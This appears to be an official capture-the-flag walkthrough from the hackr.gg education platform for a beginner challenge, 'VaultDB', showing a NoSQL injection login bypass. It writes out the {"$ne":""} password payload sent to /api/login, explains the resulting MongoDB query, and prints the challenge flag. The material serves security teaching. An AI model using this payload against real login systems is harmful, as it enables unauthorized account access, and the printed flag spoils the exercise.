HACKR.GG
hackr.gg — VaultDB — NoSQL Login Bypass Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

VaultDB — NoSQL Login Bypass

NoSQL Injection · NoSQL Injection
Difficulty
Beginner
Vuln class
NoSQL Injection
Steps
2
// Objective
Bypass the MongoDB-backed login by injecting a $ne operator in the password field.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Attempt a normal login
Try logging in with wrong credentials. Observe the 401 Unauthorized response and the JSON error.
Command / Input
POST /api/login {"username":"admin","password":"wrongpass"}
Output
{"error":"Invalid credentials"}
2
Inject a $ne operator
MongoDB queries can accept operator objects. Replace the password value with {"$ne": ""} — "password is not equal to empty string" — which is always true for any existing password.
Command / Input
POST /api/login {"username":"admin","password":{"$ne":""}}
Output
{"token":"...","flag":"HackrGG{n0sql_1nj3ct10n_byp4ss3d}"}
The query becomes: db.users.findOne({username:"admin", password:{$ne:""}}) — matches any document with a non-empty password.
// Flag
Flag value
HackrGG{n0sql_1nj3ct10n_byp4ss3d}
Returned in the login response when the $ne injection bypasses authentication.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute